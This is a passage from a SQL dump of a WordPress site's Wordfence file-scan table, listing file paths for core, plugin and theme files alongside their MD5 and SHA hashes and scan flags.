(0x491886276a88675b446d9d80db018632, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php', 0, 0x3d8c949aee3ad6d8beadd46577e124bd, 0x3d8c949aee3ad6d8beadd46577e124bd, 0x6d89bdf9864596ba358af0ba1dafbff8baf8c8e62a050fdb51be59400c127348, '', 0, '?'),
(0x491a6ee3dabcc220aa3dd647cec94465, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_hightlight_box.php', 0, 0x2c761d5bb43cec978548232025b08258, 0x2c761d5bb43cec978548232025b08258, 0xac1feca9cce2cfcc6bdd47846447dff187aa438afb7e474de0b554ffb9520d7f, '', 0, '?'),
(0x49284979174925992507764031edf8cf, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_move_to_inbox_24px.svg', 0, 0xdf39c77fc56bcf5a8289d55e8c5d77ca, 0xdf39c77fc56bcf5a8289d55e8c5d77ca, 0x14f6e86598992b63bf44d06a53f79dfef3bb05ab91f7cc65a477b3d56c4292eb, '', 0, '?'),
(0x4930c57ff3b953fe2432a354d0fc422a, 'wp-includes/widgets/class-wp-widget-calendar.php', 1, 0x00000000000000000000000000000000, 0x4f999c5005825cf750747c861f2db5a7, 0x4dce3effa41fbdc9662845aee71bb9725f6858b9c1976fdb838ef338409a2b4f, '', 0, '?'),
(0x49362e3a0a28cdc01007f9690042f8cf, 'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php', 1, 0x00000000000000000000000000000000, 0xf0480d050db130a4582f5ee81d1d3052, 0x014f86fd31962d7012cd51db8aaedf38905a2be617245baca16aa1a4844bd8c6, '', 0, '?'),
(0x493655890d37b4d3fa8ad60f3370edb8, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key', 1, 0x00000000000000000000000000000000, 0x8e82683caae9b67cdb3762089aa99db8, 0xd5d95ffa5e4622fde63b2b72265a7ed3a651d0eaf0a8cdf8137c0ee3b1f835a5, '', 0, '?'),
(0x4937b9773d80c51fc7abd8c0694809e9, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg', 0, 0x326906ddbf4ade86a53f8f0106dd7f52, 0x326906ddbf4ade86a53f8f0106dd7f52, 0xf3c6eabc3d8145fab6116b644260265ba8c77b6993505554ab781284cad1fe8b, '', 0, '?'),
(0x4943fe37db74311135864acabb2fcbb0, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user01.svg', 0, 0x668996021436612a400e25e7c94f7983, 0x668996021436612a400e25e7c94f7983, 0x1fd6d93438e6b85c399e44a28d94e7cc780f7de953d0087841e6b91a885378df, '', 0, '?'),
(0x494be845793cf215146208ff36bd6743, 'wp-content/themes/Impreza/config/demo-import.php', 0, 0x06cdea8986cc05f7e941c703fe2aca94, 0x06cdea8986cc05f7e941c703fe2aca94, 0x1d52c85deeaf3516d963086a61e5faeb5d637bbcef9d45d3fcafffb09565fada, '', 0, '?'),
(0x495221a34bfa3c976c1dea8e537bf1a7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/alarm.svg', 0, 0x6f74ccbe0c5443ca7bec3d73f30eae53, 0x6f74ccbe0c5443ca7bec3d73f30eae53, 0xf73e62ad622422b8cb1ad2cd02dcaad752d6315d68f7982e245c86db48808e41, '', 0, '?'),
(0x4995c43a17420e73de23d7e7ffde40d7, 'wp-blog-header.php', 1, 0x00000000000000000000000000000000, 0xf3f43bcb755e7599abfd0cb56b710e81, 0x35437a1bb5e50430a8db9093750c17fe58b5da49b39e2196108b5814b5e5a484, '', 0, '?'),
(0x4995c82093e65d1a421a0b116db725a7, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_vpn_lock_24px.svg', 0, 0xd606b8032d6a393a4490b7163a455eac, 0xd606b8032d6a393a4490b7163a455eac, 0x0eeaf892ea16a4f24a555807eb46ad4754ad9de16d5b8070338f32c3e88523f7, '', 0, '?'),
(0x499677bc8995362927c4001b48c13499, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_check_24px.svg', 0, 0x397136c888430dfa760e67e9893e5faf, 0x397136c888430dfa760e67e9893e5faf, 0x9716b8e498a1f22545e910b72eed81358970c049b19f031270da193e4e57dd6b, '', 0, '?'),
(0x49b30f28286eb7ad95f50c61cc2fbb8b, 'wp-content/themes/Impreza/framework/config/header-templates.php', 0, 0xcceb0f8b9435acbbe4df234b7d6512e9, 0xcceb0f8b9435acbbe4df234b7d6512e9, 0x655faa313f45b6e6fe4dedfdb42e61cc29359e66a084b4ce5393d6e709a0108d, '', 0, '?'),
(0x49bf60b60d9286903c105680306239d8, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Gradient.php', 0, 0x208629e6d7f91036269180703ce4911d, 0x208629e6d7f91036269180703ce4911d, 0x4944fc8bd5d00dadfce5b8430d754a1b726f16dd95caac2ab747952a4143934c, '', 0, '?'),
(0x49c6d4acf36cf3aca9f0b2a77617304f, 'wp-includes/js/dist/core-data.js', 1, 0x00000000000000000000000000000000, 0xa00f664edef495e33670bc0524284989, 0xaadcce91caf8a02cbfc30794dda9d4689d78ce2ccd57a584e94d04a0b5ddf72c, '', 0, '?'),
(0x49d650450114d058749c461e48ef2596, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php', 1, 0x00000000000000000000000000000000, 0xae9af300c2f5ec4c76bf5b63dece293f, 0xa443da026821dd80467f24ec7db97764b8376228a621e470f7494602152e4c90, '', 0, '?'),
(0x49f1562f92f0b536a4137311e3c3f80b, 'wp-admin/js/editor-expand.min.js', 1, 0x00000000000000000000000000000000, 0x1ce055e767e96eeef80e5eb33bf2beb6, 0x215b87e80344a98b803c31ca8c2832b7c90298a4ac990807f14f9b899f3194c9, '', 0, '?'),
(0x4a02861400ad16420dc902b0f3b397df, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg', 0, 0x803f530ed80360ab05280fa9d4a2e058, 0x803f530ed80360ab05280fa9d4a2e058, 0x8f63ab49107cab28b7a201058f3111542cd8fae6e003451f7d9f672f1bd6abf3, '', 0, '?'),
(0x4a02ce252eacf37e9cc29771e16cbc10, 'wp-includes/class-wp-text-diff-renderer-table.php', 1, 0x00000000000000000000000000000000, 0xa1eea28aa6a0577db4c0eef085366a40, 0xb15a5254bf5d0b2f3d843bc48d30b5a6467bb0fdc3349772a4560334b5605c56, '', 0, '?'),
(0x4a083f23b3cd8c24014d0cf937d36384, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php', 1, 0x00000000000000000000000000000000, 0x0b60c4490c2e3a8f9b137fe2605052e4, 0x237ad415b85299021a4855e8c9ee3e42e86e502c9f9c169227836554ac74dfba, '', 0, '?'),
(0x4a0b66b80f333ff693875f72db431f91, 'wp-admin/images/w-logo-white.png', 1, 0x00000000000000000000000000000000, 0x6ea6ccee4a0176dba27ebb79ac175c85, 0x6ec19d449ab08b207f125fcf3b15d32147abd79d635683304d1b3969eb823dbd, '', 0, '?'),
(0x4a10fe890c455ba57f3755d2d31aef7e, 'wp-includes/js/plupload/handlers.js', 1, 0x00000000000000000000000000000000, 0x326108da685f0873de9fc07143688f1e, 0x5dcdfd66218d9364d1aa09a44ba33eeb40436485813b21a8cd4702f6521d56f5, '', 0, '?'),
(0x4a12aaa75afb828ecc2da3c2b049c587, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file10.svg', 0, 0x4c59ab77a5742d8482aebdc81154e881, 0x4c59ab77a5742d8482aebdc81154e881, 0x33525352285e53f7699553c2114689946fe9aaed02c75828ad758697455a63cd, '', 0, '?'),
(0x4a38fe1c0c45989e44682ba6109d9f46, 'wp-admin/js/site-health.js', 1, 0x00000000000000000000000000000000, 0x37c6ab849b0abab3b2aec4f3f47f05a9, 0x433c6569af7c519bf2939c7db139bc16cfc751c3c09f1c0de3fec3252f3aab98, '', 0, '?'),
(0x4a3a0e78556a5a69ebf127a8d59840e4, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_extra_24px.svg', 0, 0x23084aa2599b2adb22045697b1d81fb7, 0x23084aa2599b2adb22045697b1d81fb7, 0xb9bfc76cb661c471b4e84ebe07e8d44e4eb7d88c1a13813db705daa9967f6c9c, '', 0, '?'),
(0x4a441adb9eed43ddcca80603bf861af8, 'wp-content/themes/Impreza/framework/shortcodes/vc_tta_section.php', 0, 0xe4c0af6e8fc5820d79be05831502eb11, 0xe4c0af6e8fc5820d79be05831502eb11, 0xd52f606f19ce703d8a442754083d11d91bf10dda64af130279c96f9362d1c435, '', 0, '?'),
(0x4a636ed961cd6ac8e434d09f10206fdc, 'wp-content/plugins/revslider/public/assets/css/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x4a6c9a01c618a8319ecfe318a5eae71e, 'wp-content/plugins/wordfence/models/.htaccess', 1, 0x00000000000000000000000000000000, 0xa34522784bcaea0e7bc738f6645312b3, 0x4387bef6bd277285150339bdec4004e24ba1de8674a1aa99f6e2a77723406bba, '', 0, '?'),
(0x4a7ba3d6b9065a6906055ec3b9789549, 'wp-admin/media-new.php', 1, 0x00000000000000000000000000000000, 0xde92b3849de0238412beb14c25fcc69d, 0x0f73aecf2f15beaa6fde3b8e87fad5ec80343bc62bbeb4bf119f7de2a549c7a1, '', 0, '?'),
(0x4a8331c036613f2729ae3838ed7279f3, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg', 0, 0x364384970bed18c6e5992e22875c806a, 0x364384970bed18c6e5992e22875c806a, 0x4574b2438ed69e6e4bb64ace82b6f443b5cf7e754f0df940a22c8fc0147f9bd4, '', 0, '?'),
(0x4a8bf86d4fe3eac4d21b600ce18a66e3, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php', 0, 0x35a16cff77a8d7af3c57db8e427c5537, 0x35a16cff77a8d7af3c57db8e427c5537, 0x1ac9f8b0a1ac2ced031c71190976f39b022f670bb0e2220a796421a05dfe31b7, '', 0, '?'),
(0x4aa23e1fd7e6efa301c5f81022cde42f, 'wp-includes/Requests/Auth.php', 1, 0x00000000000000000000000000000000, 0x3197d2529dd957b2acc3944f5bfcd64a, 0x624fda0451e277c3b9ec4cd1a0c3a20efea9ac968d999b833951c0d46c72126c, '', 0, '?'),
(0x4aa7defed4087e5f911dd223fa29236e, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg', 0, 0xe208ba6c29bb592121d8c78acc7b6531, 0xe208ba6c29bb592121d8c78acc7b6531, 0xa38ca6628b99d7b400a5019689f6dba75ee3533a7494e3ad5d5657c491dc32be, '', 0, '?'),
(0x4acdb6015bb0ba32dbb0ae30d31d9998, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_system_update_24px.svg', 0, 0x4388fba12e426a1c8f6d83a869e4c7b7, 0x4388fba12e426a1c8f6d83a869e4c7b7, 0xb3e274ef90e0de7486034ee301ca1c47e979744a35806f209b079db9f003b358, '', 0, '?'),
(0x4ad1022a1f6736ca9fa4027e7670c440, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg', 0, 0x25c5af75b4c5938900c78c8a0cbf9289, 0x25c5af75b4c5938900c78c8a0cbf9289, 0x53311b69a7d9054bd1a16e4bd667ed2de6740fd5233c123ac019d5b4f9cc2de5, '', 0, '?'),
(0x4ad5ac3485e71e110de06eeacee7a618, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png', 1, 0x00000000000000000000000000000000, 0xeb4a975c630f379279fe78c604d0b36c, 0xb37ec0cd71569ac203afbe2a27c5103194a5a49a9d175d33905e91f69ecdc96d, '', 0, '?'),
(0x4ae2aa4b40f83af4b3914a70446ffedb, 'wp-content/plugins/revslider/includes/framework/wpml.class.php', 0, 0x7fdb4c987959ef421bc9c7bf13f68b71, 0x7fdb4c987959ef421bc9c7bf13f68b71, 0x4837795e6264cec75e38c4baab315df69d5796ce406ea7f386ddccbee93c43b9, '', 0, '?'),
(0x4ae336f946b2a2800ff50d173fc5e7c1, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_wallet_24px.svg', 0, 0x23bcf9ad3885d883a7c04b9fe304fb5a, 0x23bcf9ad3885d883a7c04b9fe304fb5a, 0xcd1d0d95f48036228405444e45de5f00a90882878bdcac0e4ffba5e95e4547f9, '', 0, '?'),
(0x4aecfb2e1cf473cae91c7d1e046aa942, 'wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php', 0, 0x3c12c9531b8985c56aafaab1367c3946, 0x3c12c9531b8985c56aafaab1367c3946, 0xf7d895183c4e4d8b9725e0233cd89809ba21c41e6ffed761b067ead0dcb74a34, '', 0, '?'),
(0x4af2be81acb4ca4f68d3fdd07344d8be, 'wp-includes/js/zxcvbn.min.js', 1, 0x00000000000000000000000000000000, 0xa0ba2f2c8a1dd2594208e4f45b50b390, 0x4b9a751b50f3be95022095134b1a86c500d5cc59412c51d7a9d4a3f05b19db75, '', 0, '?'),
(0x4b15be8d06e4f7dfbae186621ca41c13, 'wp-content/plugins/wordfence/lib/compat.php', 1, 0x00000000000000000000000000000000, 0x3eeeb511e3f8ce7af07814948a438a7d, 0xbe191f1f4edc93bb231864d274a4422122144dd59e01ff3d3dcb40136f8213b2, '', 0, '?'),
(0x4b2e4a0fe5dc22106f1ffdc60b44689c, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-post-settings.php', 0, 0xbf8244f24e5cfd11a938bdc463591344, 0xbf8244f24e5cfd11a938bdc463591344, 0x9a822ea60615e73be9798ce6afc11e28b0fb9535fb541acca870f962654850bc, '', 0, '?'),
(0x4b30b5f6f20dc5e996dc9063156ee7fb, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php', 1, 0x00000000000000000000000000000000, 0xfe9bc385fa4b57803c84531a837c725f, 0x4560c87760b0fc3e2e0cd7d332b9f28d85562297e1004d700d208639b77fe0e4, '', 0, '?'),
(0x4b38c545a51b390817b2a1bbc1b5f205, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_24px.svg', 0, 0xbe2864444e3d86215f32f2d9838ac29b, 0xbe2864444e3d86215f32f2d9838ac29b, 0xb0b68124370751c80d8252d974a6352c10ba79e5b5c67dbeae8b564fde8c72b5, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x4b4a79de65540757b48e10e7c318de91, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_dual_button.php', 0, 0x2687a727059baaece476c3bd770d406c, 0x2687a727059baaece476c3bd770d406c, 0x613fbe5dcc214a5d4d19e8fd06f0ac10b073b7fde68a58eca2aeb2dcdbee8a50, '', 0, '?'),
(0x4b4b4f1266ba5364ab6942304f76f3ea, 'wp-content/plugins/wordfence/views/scanner/scanner-status.php', 1, 0x00000000000000000000000000000000, 0xde91f0f85b2ec99599def6026c5c3a12, 0x26c0f06b306c878363efa016582abd912a18193fc0cfcd0de0e48f06e4dc92a5, '', 0, '?'),
(0x4b51d9d4892bdb1d185debd61eacd764, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_recline_normal_24px.svg', 0, 0xa12ae3954911e1d8cdcf22b249e65bc7, 0xa12ae3954911e1d8cdcf22b249e65bc7, 0x90d1cda6bb8f92e6aad7c589ff21d0c0e255d717775d7356b9b248497e95252f, '', 0, '?'),
(0x4b57c85c19eda35bdad42f181c0c3100, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg', 0, 0x491797856417859bd2be19f9ec2a976d, 0x491797856417859bd2be19f9ec2a976d, 0xd5eba7e348dc7684b774847f23a7b52917c69c9ef9fa0bbda898f68d50bfcc45, '', 0, '?'),
(0x4b5e50c8d2034aff070424477b2a6618, 'wp-content/plugins/wordfence/js/jquery.tmpl.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0x805c7dc322a386178b37dab79295445a, 0xdf2e49f4481a0f841b6700f39d4821376091a367dea05af87ac88483c5be367c, '', 0, '?'),
(0x4b6b738927aad297cd2c97070e764d4f, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Dual_Button.php', 0, 0x2f92e7d17e811eebeb8b7358823d9e56, 0x2f92e7d17e811eebeb8b7358823d9e56, 0xb2c693e52ead5a6a0d1f0f11b6d1092aa1457a475827414f520e7bba9fb23ba7, '', 0, '?'),
(0x4b7fbaa980a77a0ed4bcdc525d96365c, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_left_24px.svg', 0, 0x4db43064b016782e8b35b58d9dc19afb, 0x4db43064b016782e8b35b58d9dc19afb, 0xf38804b8b195fdad95efc6662f78718790c8005a7cef048f4c695ba929fcae5d, '', 0, '?'),
(0x4b816ed28b4426067352f4575519288b, 'wp-admin/css/farbtastic.min.css', 1, 0x00000000000000000000000000000000, 0x23d55eb53a88478028930c82b13a6b0a, 0x341cb7b0375687669bdd20f1be2fef1489bce580eac3c3e644148cfa57033370, '', 0, '?'),
(0x4ba4c086ed6f7b74b2df117892d84636, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg', 0, 0x5245c167a4f778102ab507de91d6b79a, 0x5245c167a4f778102ab507de91d6b79a, 0x1f29c4b2d1c93781c64e05b8d6c66aba1874887419785a92f527d3e4e08aa844, '', 0, '?'),
(0x4baf638e8a231c053273922f2885228e, 'wp-includes/widgets/class-wp-widget-pages.php', 1, 0x00000000000000000000000000000000, 0x0cf65f296c47a17d0291935904620d8f, 0xb6a1254cc5683154b8b3cc8ab2add75b49544a885b1d45a23cb118b523936924, '', 0, '?'),
(0x4bafaa3c0ba9483c37c5459e2c6ce7df, 'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php', 1, 0x00000000000000000000000000000000, 0xc58e71a301d19ec2afedb72fab090adb, 0xa657a7d15f88830d465f481b003709699a61c19a8774ce72d888864d3dfefec4, '', 0, '?'),
(0x4bb9bfe315a00d5c02557af7f51a3a27, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php', 1, 0x00000000000000000000000000000000, 0xec56c52afbca46e8b0af9df13c8ea46c, 0xe5c2aea252946c079655f1d902a08f99777a06d7616e6b96c747de74ba1233ee, '', 0, '?'),
(0x4bbe88d9836beb9a6ad9f3c8354bedec, 'wp-content/themes/Impreza/framework/shortcodes/vc_video.php', 0, 0x178fa0b8b8708faa4733b0e3db862c30, 0x178fa0b8b8708faa4733b0e3db862c30, 0x13ddccc68a3d137f7d217771af582bd2ce22184effde2bdacd9fce0940ee9ab5, '', 0, '?'),
(0x4bbfe55d4304ed19eea96c373ac44400, 'wp-admin/js/widgets/media-audio-widget.js', 1, 0x00000000000000000000000000000000, 0x1853c2371eabae2afccfb72a5523edbe, 0xdcd8ed53e49b9a6ab8882f79719a5f1f68fa6ffad3b3b16edb6d75c6af5985f2, '', 0, '?'),
(0x4bcb4c783c43a08e98084894f48f651a, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php', 1, 0x00000000000000000000000000000000, 0x2db745064ee4c482db9b0c280afa6e1b, 0x9a040b16f7de10a104d1ac7d5e8d4546d0f91c9bcade3ef41e92da8242ecdb1e, '', 0, '?'),
(0x4bfa11da57ff2600004bb500368247f4, 'wp-admin/js/set-post-thumbnail.js', 1, 0x00000000000000000000000000000000, 0x4e8d87c996953d8e9566e682ba348441, 0x174475ef8065baa261ab4f88b35fe22dbaafd0ee0c916d7a83ea2fa82b28716a, '', 0, '?'),
(0x4bfd4b2bec86c032a4090861655a9365, 'wp-includes/class-walker-comment.php', 1, 0x00000000000000000000000000000000, 0xb6646e4144ec59c32819ef66b0a0fa70, 0x5f263b5842f3bc0bd6df43270492736c6b6846efc413429bbd966f2b3148b697, '', 0, '?'),
(0x4c12115e1c5bbd3021f15fd22e2f19ad, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg', 0, 0x5a9233cbb0f6724c916ed7fd66ecfec1, 0x5a9233cbb0f6724c916ed7fd66ecfec1, 0x230bb9fd4e963f8d3736d2b6918704e8324784c6c56bc135cc6afc3545b87c83, '', 0, '?'),
(0x4c1f3c23b3f313861ad27fe1bcd3dc7d, 'wp-includes/js/tinymce/skins/lightgray/img/loader.gif', 1, 0x00000000000000000000000000000000, 0x394bafc3cc4dfb3a0ee48c1f54669539, 0xf6f13b91b4c0548ba54f602836ccd82cc0736b865a908bfb63d8521dc513982b, '', 0, '?'),
(0x4c23d61fac2fdbb02accf833f2d2ec0d, 'wp-admin/includes/class-wp-terms-list-table.php', 1, 0x00000000000000000000000000000000, 0x9fb7a8631784376ec1badb8d379288fb, 0x25ddd16e54423996cf1bf7189702ab9f3b95e1acf7d5ec5934b38357557ff547, '', 0, '?'),
(0x4c28cafda26ef8395b1232c04336e59a, 'wp-includes/js/zxcvbn-async.min.js', 1, 0x00000000000000000000000000000000, 0xbf8ad109c3719269fdec077456a255e0, 0x829cb24641807da0d360900e55109a2c09828d4f68c69368b903507e30d72d1c, '', 0, '?'),
(0x4c3f0e0ab72dc356647ded091f97f480, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg', 0, 0x155e7d972c9a7de02a8b5e5d802c6315, 0x155e7d972c9a7de02a8b5e5d802c6315, 0x1a0814312af662fc53489cbed0b2287f560826547a56cbd73fb60fbca64d584a, '', 0, '?'),
(0x4c52023751bce416546f08477cc41e7b, 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php', 1, 0x00000000000000000000000000000000, 0x406c4dffd5331e4a748f4f4605bc0540, 0x5be983c560bf845c89c170c7a3c7f3ca54f1623e3db3eec75069e076124f05f6, '', 0, '?'),
(0x4c530d02dd0ae4afd624f3bdce1d94c9, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_24px.svg', 0, 0xba6d78906e125df6d37d30d56dcbf357, 0xba6d78906e125df6d37d30d56dcbf357, 0x8e479f236e6b932752b5dedbf14d6de0fd99df2b188100bac50b9332e62cc808, '', 0, '?'),
(0x4c617095b2903867f456e32cbee667db, 'wp-includes/js/dist/vendor/react-dom.js', 1, 0x00000000000000000000000000000000, 0x22aa1f16fffcd8050495b19e49143bf1, 0x29cdaef3cd1bc3ea7af3d7f7497de61bf80c2fa3c33f16a0872fd42b13316b0a, '', 0, '?'),
(0x4c73d087c59b0ab2637d3e1bff4b9787, 'wp-includes/css/editor.css', 1, 0x00000000000000000000000000000000, 0xb440cfaf53dc78b60e479c8e43df12d1, 0xaa690e1a9f4044045f90f0f85b5f524c260acd29833ad8a31f457bd07038a86c, '', 0, '?'),
(0x4c7a02f981d0ef015ad1fcf81023903c, 'wp-includes/class-wp-locale-switcher.php', 1, 0x00000000000000000000000000000000, 0xcbc322c63fcf46b4772ce80e5416c6f2, 0x21408d42f90ed33c36bf10ea8192c24b75eadf506d3d14ae832baf2f63065feb, '', 0, '?'),
(0x4c7d50c135d6ed73ebd56879711b25b7, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg', 0, 0xf3d07e31edb8a3df8a210249e0a1eaf2, 0xf3d07e31edb8a3df8a210249e0a1eaf2, 0x2d754bd1020748af4f0a949ce7845429f3193085fa4ee7b21f20b5e3503991cf, '', 0, '?'),
(0x4c8b2f02e7dfb974023b04768b7be4f3, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg', 0, 0x66905194f4b5f51dc40a6ec9cebc9997, 0x66905194f4b5f51dc40a6ec9cebc9997, 0xb6da785422516e0676549bd0335c9bede083ec00f830ab472071eb77cf9a37db, '', 0, '?'),
(0x4c940ce7e3e3cea9a527fb0d9e504476, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg', 0, 0x30241523dc343d2b1c89589fba37fe59, 0x30241523dc343d2b1c89589fba37fe59, 0xd265cdcc14d4e05025de6a9808605c3e2b009df5c4de61860be7c78ccd32e86c, '', 0, '?'),
(0x4cc2118a651fa17422706328099265c7, 'wp-includes/wp-db.php', 1, 0x00000000000000000000000000000000, 0x8b19f93df274176581dc7a01b1dfa4b3, 0xa572afc2f342fb69f4e54e6ab0a8352c7482568ada0eda8ff0504d6ca01fa205, '', 0, '?'),
(0x4cc29ad9bb647c7a566cc8abd9638286, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg', 0, 0x130400cf0e6394d81fff1e64cd8251b6, 0x130400cf0e6394d81fff1e64cd8251b6, 0x79eeeed0240f4da61dc662bd7abfa2ce4e3723a97974a7902c78ceeb1ea36ff8, '', 0, '?'),
(0x4ccab5e4ed2a91000033891bc309e08f, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_24px.svg', 0, 0x7685e254a4ff278acef67683b0191e44, 0x7685e254a4ff278acef67683b0191e44, 0x87ecc359b0fff5822dd00c1cf23306c20ef17b3f914d2322758c64b59345c114, '', 0, '?'),
(0x4cef81ac2b71b956ca3b9768d0cb5995, 'wp-includes/fonts/dashicons.woff2', 1, 0x00000000000000000000000000000000, 0xe3ce3e0415834a28cb23ac40d5ef1acc, 0x2978a9e5855fae0a60cd54c0d010f4c7ac98a9c31f974f845ecd5ec5686e0655, '', 0, '?'),
(0x4cf13e0f74061199f59a4eff88868bdd, 'wp-admin/css/colors/blue/colors.scss', 1, 0x00000000000000000000000000000000, 0xd9d03549d79484672c29145aad594db3, 0xf85c6b9b8853dbeb9a91df6e207757fd9a091bff21d32a03c17ea676900edd11, '', 0, '?'),
(0x4cf78529d1d96124ad442defd3aeaa4a, 'wp-includes/js/tinymce/plugins/wplink/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x9fe35a0b1b7b33a545272a5c8d3710b0, 0x7d80326778c2ad09ae4c1d9662ddf538f2df503f77d9919f8f61f3b7882e8c00, '', 0, '?'),
(0x4d0ec3c8b18d311342c5d53ae9662c26, 'wp-content/wp-cache-config.php', 0, 0x0814b6dec5faa6fc745c791b7eecdca4, 0x0814b6dec5faa6fc745c791b7eecdca4, 0xf044cec8bb7952301a684ec01cb03fed525d3712d8ce55d983a59a2d53e252b2, '', 0, '?'),
(0x4d157831c78b546dbe52025f1c14326f, 'wp-content/plugins/wordfence/views/dashboard/global-status.php', 1, 0x00000000000000000000000000000000, 0x982e319fdad028193ef704ab1a56457e, 0xcb4968f9818df713ecafebe6a397687489157f3b90f59861369b4e2ad87a1008, '', 0, '?'),
(0x4d286d327989df4e7fe93e16552b6342, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg', 0, 0x428792c3f513b0846603a8de11e3780b, 0x428792c3f513b0846603a8de11e3780b, 0x705e849a227887d95c922ea5c4e53702a2d5cec99a8cd61e95f28c07cf2c40a0, '', 0, '?'),
(0x4d31d2da2faa0c6ea7edcc9651870ea0, 'wp-includes/css/dist/components/style.min.css', 1, 0x00000000000000000000000000000000, 0xdf32fa0a51fae2f512a26cce865dff85, 0x64f603798bfa3405db5a0a4b02a8cc7f588ca9d6d56d46520bbc0cefb01d01c4, '', 0, '?'),
(0x4d3f2c35d82aeef3c904fadc4b2ac566, 'wp-admin/js/post.min.js', 1, 0x00000000000000000000000000000000, 0x2ccb4e6d8db314a751d0f26ccb1f3050, 0xd5f772a1461c2e1fdf20d551a5ce8e38ee5d3fbdf417b964a8054ae270003467, '', 0, '?'),
(0x4d4845dc13046c4d04995e911fd646cf, 'wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg', 0, 0x3ef28b71cac1343b1a6331f46995f59b, 0x3ef28b71cac1343b1a6331f46995f59b, 0x2e9c330b2575cdfa5e9c40dccd40ce393404626be14b5007ead350da542ff4bb, '', 0, '?'),
(0x4d5554cb817d98e44306bad9ba5ea622, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.mo', 1, 0x00000000000000000000000000000000, 0x970e6e5501a8a790dd74c5ddb039be67, 0x25d00833fa1ec81d1f98d8ed41621266ea6498f2691de4d308472a19f19a9bf0, '', 0, '?'),
(0x4d57800912e510a6be1f3ac9e498d98a, 'wp-admin/images/align-none.png', 1, 0x00000000000000000000000000000000, 0xf1ad65716432a0a1da7591a5c2f10d04, 0x1da4672811b831038658e3a4117b8610205b5d2ea1fc8d54828ea19341d9c4f5, '', 0, '?'),
(0x4d598cf14788b05c740358fb84929d2f, 'wp-includes/customize/class-wp-customize-color-control.php', 1, 0x00000000000000000000000000000000, 0x47e1df0250276e893bca671c74539b2b, 0x43f39055ba5d18734d75c166972d7ade498d00ea3df93b7086f0c372f0cc8eda, '', 0, '?'),
(0x4d68b4e48bd8c487d7f2898c89978cb1, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg', 0, 0x1e72155ed1db282de9c64efb4c8ffc3e, 0x1e72155ed1db282de9c64efb4c8ffc3e, 0x34cfbee2ca8e5611ec528124acd7b8c9080cf3b380990ec0d9963c269c83195c, '', 0, '?'),
(0x4d8402394eb715b111e64818081c9c30, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/glasses-moustache.svg', 0, 0xbec0d724a083a89c8332db2449d226a2, 0xbec0d724a083a89c8332db2449d226a2, 0x0b1ad6961b278a633d496eb30db54d0525c07fdc96a1474b95b4807e856111bb, '', 0, '?'),
